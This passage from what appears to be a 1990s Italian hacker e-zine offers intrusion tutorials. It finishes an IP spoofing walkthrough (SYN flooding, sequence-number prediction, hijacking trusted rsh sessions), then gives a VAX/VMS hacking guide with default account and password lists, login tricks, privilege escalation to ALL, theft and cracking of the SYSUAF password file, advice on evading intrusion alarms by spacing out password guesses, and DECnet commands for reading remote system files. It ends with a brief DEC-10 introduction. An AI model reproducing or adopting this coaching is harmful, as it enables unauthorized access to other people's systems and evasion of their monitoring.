capire che i dati stanno andando nella giusta direzione. 


Il computer A conclude inviando l’ ACK contenente 
VISND. 


Schematizzando: 

A...B: SYN, ISNa 

B...A: SYN, ISNb, ACK(ISNa+1) 

A...B: ACK(ISNb) 

Questo tipo di connessione e’ chiamata in inglese 3- 
way handshake. Gli Initial Sequence Number sono dei 
numeri a caso che incrementano il loro valore di 128 
ogni secondo e di 64 ogni nuova connessione. Quindi 
se si apre un collegamento ad una macchina si puo” 


anche sapere quale sara’ la sequenza successiva. 


Il SYN ha il solo scopo di chiedere la connessione al 
sistema B in modo che questo possa controllare i 


numeri iniziali mandati da A e far partire la sua 
sequenza di login. 


Torniamo a noi: 

L’hacker C prima di tutto deve aprire una connessione 
con il bersaglio ( in questo caso B ) alla porta per la 
posta elettronica ( porta 25 ) o alla TCP echo port ( 
porta 7 ); questo da’ l’ISNb. 


Poi C impersona A e manda una serie di richieste di 
connessione: 


©A...B:SYN 
©A...B: SYN 
©A...B: SYN 
©A...B: SYN 
©A...B:SYN 
©A...B: SYN 


©A...B: SYN 


©A...B: SYN 


B risponde ai vari SYN di C credendo di mandare i 
messaggi ad A: 


B...©A: SYN, ISNb 

B...©A: SYN, ISNb 

B...©A: SYN, ISNb 

ecc... 

Cosi’ facendo si concede ad "A" di entrare. 

Da questo momento tutte le future connessioni con 
quella porta TCP verranno ignorate a causa 
dell’afflusso delle connessioni mandate da C. ©A...B: 
ACK(ISNb) usando l’ISN aumentato come abbiamo 
visto prima. C non vede nessuna risposta da parte di B 


poiche’ quest’ultimo le spedisce ad A. 


Se tutto e’ andato bene lo rsh server di B pensando di 
connettere A, da’ libero accesso a C. 


Per fare credere a B di essere A bisogna che 
quest’ultimo non sia collegato per poi, cosi’, prenderne 
il posto. 

I messaggi ip, inoltre, devono essere modificati in 
maniera tale che la risposta di B non arrivi ad alcun 
host poiche’ quest’ultimo potrebbe mandare indietro 
un messaggio RST ( reset ) che annullerebbe la 
connessione. 

Ricordate: 


Nessun pacchetto di informazioni deve tornare indietro 
a voi in alcun modo! 


I servizi vulnerabili all’ip spoofing sono i seguenti: 
SunRPC & NES 


I comandi remoti del BSD Unix ( rlogin o rsh ad 
esempio ) 


X Windows 
Firewalls basati sul filtraggio dei routers se il router 
non e’ configurato per bloccare i pacchetti provenienti 


dal un dominio locale. 


Alla fine, le cose che vi servono per poter sfruttare 
questa tecnica sono: 


L’host bersaglio; 


L’host a cui "devono arrivare" i messaggi mandati dal 
bersaglio ( quello,cioe’, che dovete impersonare ); 


L’host dal quale attaccate ( dovete essere root qua! ); 


Un software per l’ip spoofing ( vedi alla fine di questo 
articolo ). 


Sotto riporto lo schema di un pacchetto di 
informazioni ip: 


4-bit | 4-bit | 8-bit | 16-bit | 
| Lunghezza | Tipo di | Lunghezza | 


Versione | Intestazione | Servizio | Totale | 


16-bit | 3-bit | 13-bit | 
|| Variabili di | 
Identificazione | Flags | Frammento | 


8-bit | 8-bit | 16-bit | 
Tempo da | || 


"Vivere" | Protocollo | Controllo Intestazione | 


Dati ( di lunghezza variabile ) | 


I numeri a 32bit indicati come Indirizzo di provenienza 
e di destinazione sono i due piu’ importanti dati nel 
pacchetto IP e sono alla sua testa. Piccola nota: Il 
tempo da "vivere" ( detto anche TTL= Time To Live ) 


indica il numero di salti di router che un pacchetto IP 
puo’ fare prima di essere scaricato definitivamente 
dalla rete. 

Una volta che si e’ ottenuto il controllo del terminale 
B, e’ possibile accedere ai collegamenti remoti che 
sono connessi a quel terminale. 


Riporto in seguito anche lo schema per un segmento di 
informazioni TCP: 


16-bit | 16-bit | 
| Porta di | 


Porta di provenienza | Destinazione 


4-bit | 6-bit | 6-bit | 16-bit | 

Lunghezza | Riservato| Flags | Grandezza | 
Intestazione | || Finestra | 

16-bit | 16-bit | 

Controllo del TCP | Indice | 

| Urgente | 


Opzioni ( se ci sono ) | 


Dati ( di lunghezza variabile ) se ci sono 


Per poter effettuare questo tipo di attacco dovete 
conoscere bene i computer connessi a quello che volete 
attaccare per poterne prendere il posto e "fregare" il 
vostro bersaglio. 


Quindi prima di attaccare un computer ( e questo vale 
come regola generale ) scoprite tutte le informazioni 
possibili legate a lui, alla rete e a quelli che ne fanno 
parte con comandi come: 


finger 

who 

rwho 
rpcinfo 
showmount 


Una volta connessi al sistema potete ( ma dovete 
intendervi parecchio di unix ) utilizzare un’altra 
tecnica chiamata Hijacking che permetterebbe, 
modificando il kernel del computer sul quale siete 
entrati, di chiudere tutte i possibili tentativi di 
connessione al sistema. 


Per quanto riguarda l’hijacking del sistema ci sono da 
dire alcune cose: 


Per effettuare questo tipo di attacco bisogna possedere 
un tool ( attrezzo ), programma, chiamato "tap" in 
grado di prendere il controllo delle connessioni 
esistenti su di un sistema. 


Questo programma ( che va’ a modificare il kernel del 
computer bersaglio ) permette agli intrusi, con 
privilegi di root, di guadagnare il possesso di qualsiasi 


connessione esistente sul sistema bersaglio 
permettendo all’intruso di utilizzare comandi come se 
fosse lui il proprietario di quella connessione. 


Se uno user ha effettuaro un rlogin o un telnet ad un 
altro sistema, l’hacker puo’ guadagnare accesso a quel 
sistema evitando le solite procedure di identificazione. 


Attualmente il solo "tap" program conosciuto colpisce 
il sistema 


SunOS 4.1.x 
Piccola spiegazione dei termini: 
ACK=ACKNOWLEDGE=Riconoscimento 


SYN=Synchronize sequence Number=Numeri di 
sequenza sincronizzati. ISN ( o ISS )=Initial Sequence 
Number ( Initial Send Sequence )=Sequenza di 
trasmissione iniziale. 


Queste sono le basi iniziali dell’ip spoofing che, 
comunque, non servono a nulla senza un po’ di studio 
personale. 


Per poter specializzarvi in questo argomento vi 
consiglio di leggere prima di tutto un buon libro sul 
protocollo tcp/ip e sul funzionamento delle reti poi, 
dopo aver appreso i vari procedimenti attuati nelle 
connessioni fra i computer, approfonfite l’argomento 
con i testi sull’ip spoofing reperibili un po’ ovunque 
sulla rete con poche e semplici ricerche. 


Se volete comunque passare dalle parole ai fatti, vi 
conviene provare ad entrare nel computer di qualcuno 
che conoscete ( magari un sysop vostro amico ) per 
poter fare un po’ di esperienza e correre pochi 
rischi...almeno all’inizio... 


Nota sull’ip spoofing: 


Girovagando per la rete sono venuto in possesso di un 
programma chiamato neptune.c ( scaricabile dal file di 
Phrack Volume 7, Issue 48, File 13 di 18 ) che 
servirebbe a svolgere l’ip spoofing al posto nostro 
richiedendoci solamente alcune info prima di partire. 
Non ho ancora verificato l’effettiva utilita’ di questo 
programma ma ritengo che Phrack sia piu’ che 
affidabile come fonte di informazioni. 


VAX/VMS ( by InfectedMachine ) 


Da questo numero vorrei trattare la descrizione ( piu' approfondita che 
posso ) dei sistemi operativi sparsi in giro per la rete e che magari vi e' 
capitato piu' volte di incontrare. 

Vedro' di spiegare quanto meglio posso il sistema e la sua storia. Le nozioni 
sul suo uso ed infine le tecniche per potervi accedere. 

Allora partiamo subito col dire una cosa: 

Se volete hackerare un VA X o siete veramente bravi ( e quindi non credo che 
vi interessi questo mio articolo ) oppure avete un forte motivo per farlo. 

Se siete alle prime armi NON avvicinatevi a questo tipo di sistema poiche' 
e' considerato il piu' sicuro che ci sia in giro. 

Detto questo, inizio con un breve accenno di storia sul VAX/VMS. 

Il computer VAX, la cui sigla significa Virtual Address eXtension e' stato 
creato dai tecnici della Digital Equipment Corporation ( DEC ). 

Ci sono vari modelli di questo computer: dal piu' vecchio MicroVax, alla 
serie 11/7XX per finire alla serie 6000. 

Purtroppo sono rimasto a questa serie e non so' se ne e' uscita una nuova. 
Perdonatemi. 

Il computer VAX usa, solitamente, un sistema operativo chiamato VMS. 
VMS sta per Virtual Memory System. Sempre creato dalla DEC questo sistema 
e' molto pratico per quanto riguarda la sicurezza di un terminale in quanto 
e' molto piu' flessibile di sistemi come lo unix o il dos. 

Il VMS utilizza un linguaggio chiamato DCL, ovvero Digital Command Language 
ed e' stato creato utilizzando due linguaggi di programmazione cioe' il 
BLISS-32 e il FORTRAN. 

Per fare un esempio lo si puo' paragonare al linguaggio batch del dos o allo 
script dello unix ma con alcune differenze. 

Una di queste e' che quando si vuole far partire un programma dal prompt 
bisogna mettere un $ davanti al comando. 

In genere i programmi del DCL sono comunemente chiamati COM file. 
Tutte le procedure di login su questo sistema possono essere eseguite in 
una di queste due modalita': 

1) Interattiva; 

2) Non interattiva. 

Il primo metodo significa che lo user deve eseguire alcune istruzioni 

( login, password ) che il terminale gli invia per poter cosi' accedere 

alle sue funzioni. 

Esempio di questo primo metodo sono l'accesso locale ( quando si e' 
connessi direttamente al processore del computer ); attraverso linee 
telefoniche o da un nodo remoto di una rete. 

Il secondo metodo, ovviamente, significa che lo user deve solo attendere 
che il software lo colleghi senza dover far nulla poiche' a tutte le 

procedure pensa il computer. 

Alcuni esempi possono essere attraverso network; tramite un batch login 
che e' un processo iniziato da uno user e che sta attualmente girando 

sulla macchina oppure tramite un sottoprocesso che e' fatto partire da 

uno user ed e' il risultato di un comando del sistema o di un servizio 

di quest'ultimo. 

Qui di seguito riporto ( presi da varie riviste sparse per la rete, prima 

di queste la LOD ) le password e gli account piu' comuni per questo 


tipo di sistema: 


ACCOUNT PASSWORD 

RJE RJE 

HOST HOST 

LINK LINK 

INFO INFO 

BACKUP BACKUP 

NETWORK NETWORK 

DECMAIL DECMAIL 

HELPDESK HELPDESK 

REPORT REPORT 

REPORTS REPORTS 

DECNET DECNET 

DEFAULT DEFAULT 

DEMO DEMO ( o privo di password ) 
FIELD FIELD, SERVICE 

GUEST GUEST (o privo di password ) 
OPERATOR OPERATOR 
OPERATIONS OPERATIONS 
SYSMAINT SYSMAINT, SERVICE, DIGITAL 
SYSTEM SYSTEM, MANAGER, OPERATOR, SYSLIB 
SYSTEST UETP, SYSTEST 
SYSTEST_CLIG CLIG, SYSTEST, TEST 
SUPPORT SUPPORT, DEC 


Una possibile schermata di login puo' essere questa: 


3 AE Ae Ae e E SE AE Ae Ae Sie Se SE Ae e e Sie SR SE Ae Ae Sie Se E SE Ae Ae Sie Se SE Ae Ae e Sie Se SE Ae Ae Sie Sie e SE Ae e Sie Se E AE Ae Ae Sie Se E AE e e Se A A AA RARA AAA 


WELCOME TO THE 
AT&T MICROVAX II SYSTEM 


Username: 
Password: 


Dopo averli inseriti puo' apparire: 


Last interactive login on Wednesday, 01-JUN-1996 10:20.11 
Last noninteractive login on Friday, 30-MAY-1996 15:38.27 
2 failures since last successful login 

You have 1 new mail messagge 


$ ( questo e' il simbolo del prompt dei comandi ) 


Come si puo' benissimo vedere dallo schema che ho riportato sopra, il 
VAX registra i tentativi falliti di login e li comunica all'utente 

quando effettua il primo login corretto ( comunque ne parlaremo anche 
dopo ). 


Comandi del VA X/VMS: 
Di seguito riporto i comandi piu' utilizzati in questo sistema. 


@: Esegue un programma. Se si vuole eseguire un file .com bisogna mettere 
davanti ad esso un @. Ad esempio: @LOGIN.COM;3 
ACCOUNTING: Questo comando fa' partire il programma accounting che serve 
per vedere quanto sei stato online. 

CREATE: Compilatore Pascal. Usare: CREATE nomefile.pas 
CREATE/DIR: Crea sottodirectory. 

DELETE: Questo comando e' usato per cancellare file o per cancellare 
directory vuote e non protette. Per cancellare un file usa il comando 
DEL filename.ext;x. Per cancellare una directory prima bisogna 
cancellare tutti i file presenti in essa ( DEL/LOG *.*:* ) poi 

bisogna settare la protezione ( SET PROTECTION ): 

SET PROTECTION=OWNER:D nomedirectory.DIR poi cancellare la 
directory DEL nomedirectory.DIR. 

DIR ( DIRECTORY ): Questo comando ti permette di vedere quali file sono 
contenuti in una directory ( vedi dir per dos o ls per unix ). 

Con /BRIEF si otterra' una piccola lista mentre con /FULL si 

vedra' il contenuto completo della directory. 

Esempio: DIR/FULL PIPPO-%%.*;% 

Il carattere % serve ad indicare un qualsiasi carattere mentre * indica 
una qualsiasi cosa. 

EDIT: editor VMS. 

HELP: Ti fornisce il programma degli aiuti ( che tra l'altro sono 

tra i migliori esistenti al mondo ). 

LIBRARY: Usato per scopi di archiviazione. 

LOGOUT: Disconnette dal sistema. 

MAIL: Carica il programma per la posta elettronica. 

$PASSWORD: Cambia la propria password. Esempio: $PASSWORD nuovapassword. 
PHONE: Usato per parlare con un altro utente. Per parlare con uno user 
bisogna digitare il suo nome. 

PHOTO: Registra una sessione. 

RUN: Lancia un eseguibile. 

SET: Vedi oltre. 

SHOW: Show puo' mostrare molte cose e la sintassi e' come in questo 
esempio: SHOW USERS DAV ( SHOW qualcosa qualcuno ). 
-CLUSTER: Mostra i cluster del VAX se ci sono 

-DEFAULT: Percorso della directory. 

-DEVICES: Mostra i device del sistema. 

-INTRUSION: Dice se ci sono degli account che sono stati hackerati. 
-MEMORY: Memoria. 

-NETWORK: Mostra il network e dove il VAX e' connesso. 
-PROCESS: Mostra lo stato di un processo in corso. 

-PROTECTION: Mostra le protezioni di un file. 

-QUOTA: Mostra lo spazio sul disco permesso per il tuo account. 
-SYSTEM: Varie informazioni sul sistema. 

-DAY: Giorno e data. 

-TIME: Ora. 

-USERS: Mostra gli user online sul sistema. 


Piccola spiegazione del comando SET: 


SET FILE/PROTECTION: settare i permessi nei file o nelle directory. 
La stringa da utilizzare e': SET FILE/PROTECTION=OWNER[RWED] 
nomefile.estensione ( RWED: permessi dei file, spiegato oltre ). 

Al posto di OWNER ( possessore ) si possono mettere le seguenti opzioni: 
-WORLD: per tutti gli users connessi al sistema; 

-GROUP: per tutti gli users nello stesso gruppo del possessore; 
-SYSTEM: per tutti quelli che hanno privilegi di SysOp. 

SET TERMINAL: 

Il comando da utilizzare e': SET TERMINAL/opzioni. 

Le opzioni sono le seguenti: 

WIDTH=80: 80 colonne di ampiezza; 

ADVANCE. VIDEO: seleziona 124 x 24 linee; 

NOADVANCE._ VIDEO: deseleziona 124 x 24 linee; 

ANSLI CRT: seleziona la sequenza di uscita ANSI; 

NOANSI_ CRT: deseleziona la ANSI_ CRT; 

AUTOBAUD: permette al computer di selezionare la velocita' piu' alta 
possibile per il collegamento; 

NOAUTOBAUD: deseleziona la voce sopra; 

BROADCAST: permette il ricevimento di SEND, MAIL e PHONE; 
NOBROADCAST: previene dalla ricezione di SEND, MAIL e PHONE; 
DEVICE_TYPE=VT220: setta il terminale come VT220; 

ECHO: abilita l'echo dalle linee di comando del DCL,; 

NOECHO: disabilita la funzione ECHO; 

FULLDUP: abilita il full duplex; 

NOFULLDUP: disabilita il full duplex; 

HANGUP: esegue il log off se non c'e' portata; 

Vi sono altri comandi ma non li riporto...se li volete proprio sapere 

tutti vi consiglio di ricercare con l'altavista la parola VAX o VMS e 
cercare un po' tra i risultati i vari manuali dei comandi di questo sistema. 
SET DEFAULT: 

Avete presente il comando cd.. o cd .. ( rispettivamente dos e unix )? 
Nel VAX/VMS per cambiare le directory o per entrare in esse e' 
necessario conoscere questo comando. 

La sintassi per entrare in una directory e': 

SET DEFAULT [.SOTTODIRECTORY] mentre per andare nella directory 
"superiore" il comando e': SET DEFAULT [-]. 


SICUREZZA DEL VAX: 


Il VAX come ho gia' detto e' il sistema piu' sicuro che ci sia in 
circolazione e questo per una serie di motivi: 

1) Password; 

2) Barriere interne; 

3) Monitoraggio; 


PASSWORD 


Ci sono ( come in ogni altro sistema ) due tipi di accessi, quello 


dello user normale e quello del root ( o amministratore di sistema ). 

Per il primo in genere il sistema richiede l'inserimento di un nome 

( login ) seguito poi da una password. 

Per il secondo puo' sia chiedere le stesse cose che ha richiesto ad 

uno user sia richiedere l'inserimento di una seconda password 

dopo aver inserito la prima...diciamo una successiva barriera di 

sicurezza. 

Raramente un amministratore di sistema mette due password per accedere 
ad una directory ma tenete bene a mente che LO PUO' fare. 


BARRIERE INTERNE 


Su alcuni sistemi, dopo esserci inseriti con una giusta combinazione 
di user e password, potrebbe apparirci un messaggio nel quale ci si 
richiedono successive informazioni e cio' potrebbe farci "saltare" ad 
un'applicazione supplementare o addirittura ad un errore di sistema. 
Per superare questo tipo di protezione si puo' provare a premere 
control-c e/o control-y dopo aver inserito correttamente login e pass. 
Questo puo' ( e ripeto puo' ) far saltare al sistema l'esecuzione di 
programmi di sicurezza, applicazioni o altri tipi di eseguibili che 
indicherebbero al computer che non siamo veramente lo user in questione. 
Alle volte, pero', gli amministratori di sistemi settano 

il comando SET in modo da non poter usare control-y all'inizio della 
fase di login ( set nocontrol=y ) impedendo cosi' che intrusi penetrino 
nel sistema in questo semplice modo. 


MONITORAGGIO 


L'intera sicurezza del sistema VMS e' basata su un concetto di monitoraggio 

di tutto il terminale. 

Un amministratore di sistema puo' controllare: 

1) Ogni informazione su di uno user, dalle info personali ai comandi che 
lancia sul sistema; 

2) Ogni tipo di applicazione e documento presenti sul sistema come, ad 
esempio, mailbox, file o terminali; 

3) Tutte le possibili forme di sicurezza sui files come diritti su di essi 
o le liste di accesso a un dato programma; 

4) I cosiddetti avvisi di allarme. 


Questo tipo di monitoraggio rende capace il system-operator di seguire 
passo passo ogni procedura di autenticazione che si verifica all'interno 
del sistema. 

Il VMS e' molto flessibile come sistema poiche' un root puo' decidere 
praticamente tutto sul terminale...potrebbero mettere una password 
sopra un dato file oppure metterne una su tutti quelli presenti. 
Potrebbero restringere l'accesso a certi tipi di utenti oppure 

lasciare libero accesso a tutti. 


Tanto per fare una panoramica generale sulle sicurezze del VMS: 


1) Il sistema permette di controllare tutti i tipi di accesso nonche' le 


password per un dato documento o per una directory nel sistema 
permettendo una maggiore sicurezza rispetto agli altri sistemi esistenti; 

2) Registra ogni tipo di interazione tra user e macchina per motivi 
di sicurezza e di documentazione; 

3) Supporta un sistema di encriptazione che permette all'amministratore 
del sistema di creare una particolare chiave per poter accedere ad 
una certa zona del computer; 

4) Come se non bastassero tutte le sicurezze sopra riportate, possono 
essere aggiunti allarmi che "scattano" quando si verificano particolari 
condizioni preimpostate come ad esempio un login errato o un accesso a 
file del sistema nei quali non potevamo sbirciare. 


Tutte queste funzioni di sicurezza si controllano attraverso due 

meccanismi: 

ACL = Access Control List; 

UIC = User Identification Codes. 

L'ACL usa alcuni indentificatori per controllare gli user: 

1) Gli identificatori UIC dipendono dal codice di identificazione di 
uno user e sono UNICI per ogni user nel sistema ( ogni user ne ha uno ); 

2) Le identificazioni generali sono definite dal root nei diritti del 
sistema per identificare gruppi di user nel sistema; 

3) Gli identificatori a definizione di sistema descrivono certi tipi di user 
basati sul loro uso del sistema. 

Una ACL consiste in una o piu' ACE ( Action Control list Entries ): 

1) Identificatori ACE: Controllano i privilegi di accesso ad un dato o ad 
una directory. I privilegi sono READ, WRITE, EXECUTE, DELETE, CONTROL 
e NONE (RR, W, E, D,C, N); 

2) Protezione di default ACE: Definisce la protezione di default per 
le sole directory; 

3) Allarme di sicurezza ACE: Manda un messaggio di allarme quando si 
accede ( o si prova ad accedere ) a qualcosa in cui non si poteva 
entrare. Le allarmi possono essere generate quando lo user "rompe" 
uno di questi privilegi di accesso: READ, WRITE, EXECUTE, DELETE o 
CONTROL. L'allarme puo' scattare sia se ci riuscite sia se NON ci 
riuscite. 

UIC ovvero User Identification Code: 

Ogni utente sul sistema ( come ho gia' detto prima ) ha un proprio UIC. 

Ogni dato sul sistema ha un UIC associato che gli consente di capire 

chi puo' e chi non puo' avere accesso a tale dato ed e' anche il 

tipo di identificatore posto sui quattro gruppi principali cioe' 

System, Owner, Group, World ( sistema, proprietario, gruppo, altri ). 

In base a questo il sistema concede o no l'accesso a uno user a 

qualsiasi cosa presente sul terminale. Praticamente in fase di login 

ci viene preso il codice di identificazione personale dal database 

dei diritti nel sistema e viene poi copiato in una lista di diritti 

dalla quale verra' informato il terminale sui tipi di privilegi che 

possediamo ogni volta che si cerchera' di accedere ad un certo dato. 


Di seguito riporto i principali privilegi di un VAX: 
ACNT: Puo' sopprimere i messaggi di accounting. 
OPER: Fornisce privilegi da operatore. 


GROUP: Puo' prendere altri processi nello stesso gruppo. 
WORLD: Come GROUP solo valido per la categoria WORLD. 
SHMEM: Puo' creare/cancellare dati nella shared memory. 
ALTPRI: Puo' settare qualsiasi livello di priorita'. 

BYPASS: Evita le procedure di controllo. 

SETPRV: Puo' settare qualsiasi bit di privilegi. 

SYSLCK: Blocca le risorse del sistema. 

SYSPRV: Puo' accedere a dati attraverso la protezione del sistema. 
VOLPRO: Puo' passare sopra alla protezione dei volumi sul sistema. 
READALL: Puo' leggere qualsiasi cosa come il possessore. 
SECURITY: Puo' far eseguire le funzioni di sicurezza. 

Per vedere i propri privilegi all'interno del sistema dovete digitare: 


$ SET PROCESS /PRIVS 


Se nella lista che compare alla fine della descrizione di tutti i 
privilegi e' presente anche quello chiamato SETPRV,, ci si puo' dare 
qualsiasi tipo di privilegio con il comando: 


$ SET PROCESS /PRIVS=ALL 
Hacking The VAX 


Allora innazitutto direi che ci sono due metodi principali per entrare 
inun VAX: 

1) Attraverso l'hack di un account & similar; 

2) Attraverso una rete; 


1) Hack di un Account & Similar 


Quando vi loggate ad un account e questo vi da' problemi iniziali 
potete provare ad inserire al fianco del login anche un comando: 


Username: NOME /(NOCOMMAND 
Password: 


Ci sono 4 comandi fondamentali utilizzabili accanto al login e cioe": 


1) NOCOMMAND: Se il login dell'account che abbiamo hackerato non 
permette l'ingresso al sistema operativo, possiamo provare ad inserire, 
come nell'esempio sopra, l'opzione NOCOMMAND che, se abilitata, 
potrebbe concedere l'ingresso al sistema evitando ulteriori procedure 

di identificazione. 

Tutto questo viene mandato in fumo se si tratta di un account particolare 
chiamato CAPTIVE. 

Gli accounts chiamati Captive permettono un uso e un accesso MOLTO 
limitati. 

In genere "spediscono" la connessione che abbiamo effettuato ad un altro 
programma o ad un'altra applicazione che permettono scarse possibilita' di 
poter penetrare all'interno del terminale soprattutto se anche il comando 
control-y e' disabiltiato. 


2) /CLI ( Command Line Interpreter ): Permette di specificare il DCL 
( Digital Command Language ) o il MCR ( Monitor Control Routine ). 


3) /DISK: Permette di specificare un disco diverso da quello di default. 


4) [TABLES: Specifica il nome di un'altra tabella CLI per poter scavalcare 
quella di default specificata nell'UAF ( User Authorization File ). 


Il file passwd sotto un VMS e' situato nella directory 
SYS$SYSTEM:SYSUAF.DAT; ricordate pero' che il VAX/VMS come ho gia 
detto prima, puo' fare in modo che questo file non possa venir 
letto da normali utenti. 

Se riuscite a scaricarlo e volete confrontarlo con una lista 

gia preparata di password ( vedi CrackerJack o Brute per win ) 
potete usare uno di questi due programmi: 
CHECK_PASSWORD 

GUESS_PASSWORD 

In poche parole dovete riuscire ( se non trovate i programmi 

che ho scritto sopra ) a scrivere un programma che, utilizzando 
le funzioni SYS$GETUAF, confronti le parole criptate con i dati 
sempre criptati in SYSUAF.DAT 


Ritornando al discorso di prima, dopo esserci inseriti con successo 

all'interno del sistema in questione, ci sono una serie di utili 

comandi per capire bene cio' che ci circonda: 

SHOW USER, SHOW PROCESS/PRIVS, SHOW AUDIT e SHOW INTRUSION. 


SHOW USER 


Se, all'interno del sistema, incontriamo un altro user dobbiamo prendere 
nota del suo nome e questo per la semplicissima ragione che avere gia' 
il nome di un utente faciliterebbe il compito di dover ricercare la sua 
password per poter penetrare nel sistema attraverso il suo account. 


SHOW PROCESS/PRIVS 


Per poterlo usare senza scatenare il finimondo sul terminale in questione 
bisogna avere il permesso di usare SHOW AUDIT e SHOW INTRUSION. 
Comunque si puo' sempre tentare: 

$ SET PROCESS/PRIVS=GROUP 

Iniziate con GROUP e se funziona, continuate fino ad arrivare a ALL. 
Comunque per lanciare programmi, vedere file o altre interessanti cosucce 
NON bisogna avere tutti i privilegi ( ALL )... bastano solo quelli giusti. 


SHOW AUDIT 


Puo' mostrare due schermate: 

La prima potrebbe dare come risultato qualcosa tipo:"Security alarms 
currently disabled" ( Allarmi di sicurezza attualmente disabilitate ). 
Oppure potrebbe indicare dove si trovano le allarmi: 


ACL 
BREAKIN: (DIALUP, LOCAL, REMOTE, NETWORK ) 
FILE ACCESS: 
FAILURE: (READ, WRITE, EXECUTE, DELETE, CONTROL ) 
BYPASS: (READ, WRITE, EXECUTE, DELETE, CONTROL ) 
LOGIN: (DIALUP ) 
LOGOUT: (DIALUP ) 


Sarebbe molto importante vedere questa schermata in modo da non far 
scattare allarmi cercando un modo per aggirarle senza 

correre rischi. 

Tanto per rinfrescarvi la memoria un SysOp puo' ricevere un allarme 
quando: 

1) Una ACL ( Access Control List ) "richiede" un allarme; se si vuole 
accedere ad un file e non si e' sicuri di cosa si ha davanti potete 

provare a fare un SHOW ACL e vedere cosa salta fuori. 

2) Il sistema individua una possibile intrusione. Il computer ha, 

nella sua configurazione, indicato un numero che, una volta raggiunto 
fa' scattare l'allarme. 

Potrebbe essere dopo tre tentativi falliti di connessione o dopo venti; 
dipende tutto da come e' stato configurato il sistema. 

Quindi il mio consiglio e' quello di tentare una o due password al giorno 
perche' credo che nessuno setti questo valore al di sotto dei due tentativi 
e anche perche' cosi' si desterebbero meno sospetti. 

3) Si accede ad un file "rompendo" i vari accessi ( read, write, ecc. ). 

4) Si accede ad un file attraverso il privilegio BYPASS. 

Molto probabilmente, se si entra in un sistema e si ha il BYPASS si 
hanno anche tutti ( ALL ) i privilegi. Non credo che qualche amministratore 
di sistema concederebbe a chiunque l'uso del BYPASS se non per un errore 
di impostazioni. 


SHOW INSTRUSION 


$ SHOW INTRUSION/TYPE=ALL 


Intrusion Type Count Expiration Source 
TERMINAL INTRUDER 9 08:34:24.56 TTAO 
NETWORK SUSPECT 2 09:03:33.39 COINS::NSAUSERI 


Il comando impostato sopra mostra le informazioni contenute nel database 
del sistema. 

Dopo TYPE si possono inserire le seguenti parole: 

ALL: E' di default e mostra TUTTI i tentativi di hack del terminale. 
SUSPECT: Tutte quelle che non sono identificate come INTRUDER. 
INTRUDER: Tentativi di penetrazione del sistema nei quali c'erano molte 
azioni evasive nei confronti del computer stesso. 


2) Hackerare attraverso una rete. 


Secondo me questo e' sicuramente il metodo piu' "facile" poiche' il VAX 
ha molte debolezze sui computer collegati via rete. 


Una volta che sia e'entrati con successo in un sistema come DECnet, si puo' 

accedere tranquillamente a file, directory e dati contenuti nel VAX senza 

che neppure quest'ultimo richieda password. 

Faro' tre esempi citati dalla Lod: 

1) $ TYPE PLOVER::SYS$SYSROOT:<SYSEXE>SYSUAF.LIS;* 

2) $ DIR DOCWHO::SYS$SYSROOT:<000000...> 

3) $ RUN LEGION::SYS$SYSROOT:<SYSEXE>AUTHORIZEUAF> 

La sintassi e': 

NOME-COMANDO NOME-NODO::DEVICE:<DIRECTORY>FILE-OPPURE-NOME- 
PROGRAMMA 


Il NOME-NODO deve essere seguito dalle due "colonne" ( :: ). 

Nel primo esempio abbiamo scaricato a video il contenuto del file 
SYSUAF.LIS che contiene tante tante informazioni importanti. 

Nel secondo esempio stavamo dando un'occhiata a quali erano TUTTI 

i file presenti in TUTTE le directory del sistema. 

Nel terzo esempio, stavano lanciando AUTHORIZE e cosi' facendo possiamo 
per esempio avere la lista degli user sul sistema oppure crearci un 
account...tanto per citarne solo due. 

Qui, per concludere questo ( forse troppo ) lungo articolo riporto 

le estensioni dei file che si trovano su un VAX/VMS: 


ADA — File compilati con Ada; 

BAS File compilati con il BASIC; 
B32 File compilati con il BLISS-32; 
C File compilati con il C; 

COB File compilati con il COBAL; 
FOR File compilati con il FORTRAN; 
MAR File compilati con il MACRO; 
PAS File compilati con il PASCAL; 
PLI File compilati con il PL/I; 


CLD File di descrizione dei comandi DCL; 

COM  DCL batcho file di procedure di comando; 

DAT  Datafile; 

DIS File di distribuzione ( come quelli della mail ); 

DIR Directory; 

EDT File di comando per l'editor EDT; 

EXE  Eseguibili; 

HLP File diaiuto; 

JOU "Giornale" di aiuto dell'editor EDT quando si verifica un problema; 
LIS  SystemListing File ( ovvero come per il comando TYPE ); 
LOG Batch Job Output File; 

MAI File di posta; 

MEM DSR output file; 

OBJ File creati da un compilatore prima di LINKarli; 

RNO File di sorgente per DSR; 

SIXEL File per la grafica SIXEL; 

SYS File di sistema; 

TJL "Giornale" creato quando accade qualcosa di insolito; 
TMP File temporanei; 


TPU Filedi comando dell'editor; 
TXT Fileditestoe file di uscita del programma MAIL; 
UAF User Authorization File ( file di autorizzazione di un utente ) 

I piu' importanti sul sistema direi... 
Il VAX e' un gran bel sistema ma, come ogni altro sistema, ha le sue 
debolezze e, in questo caso, risiedono nel network. 
Quindi perche' fondersi il cervello per entrare in un VAX senza lasciare 
traccia quando possiamo farlo benissimo da un nodo di una rete e senza 
troppi problemi? 


1) DEC-10 ( by InfectedMachine ) 


Vedro', su questo terzo numero di SystemDown, di spiegarvi il funzionamento 
del DEC-10. 

Per chi non lo sapesse il DEC-10 e' stato creato dalla Digital Equipment 
Corporation ( tanto per spiegare il significato della parola DEC ) e usa un 
sistema operativo chiamato TOPS-10 (o TOPS10). 

Per riconoscere un DEC-10 basta vedere se il prompt dei comandi e' costituito 
da un "." 

Subito dopo esserci connessi a questo sistema ci arrivera' un messaggio 

( direi quasi un classico di ogni sistema ) tipo: 

data - ora - tty 

sistema - tipo di sistema 

e l'immancabile frase: 

LOGIN: 

Il formato dei login e' un po' particolare perche' dipende da un parametro 
chiamato PPN, ovvero Project/Program Number; come in altri sistemi piu' 
basso e' questo numero piu' si hanno privilegi. 

Il formato nel quale e' scritto e': 

.Log 12,34 cioe' .Log [X,X] 

Poi arrivera' la terribile scritta "Password:" 

Questa puo' essere lunga da 1 a 8 caratteri di qualsiasi tipo come in ogni 
altro sistema. 

Se non avete mai maneggiato in vita vostra un DEC-10 e siete curiosi di 
sapere quali comandi esso abbia al suo interno vi consiglio di provare un 
-Help per sapere qualcosina in piu'. 

Puo' accadere, richiedendo gli help che il computer vi rimandi a leggere il 
manuale operativo del DEC-10 per maggiori dettagli quindi non sempre gli 
aiuti sono utili. 

Per avere una lista dei comandi da eseguire ( come ad esempio il login ) 
provate ad inserire questo comando: 

-Help * 

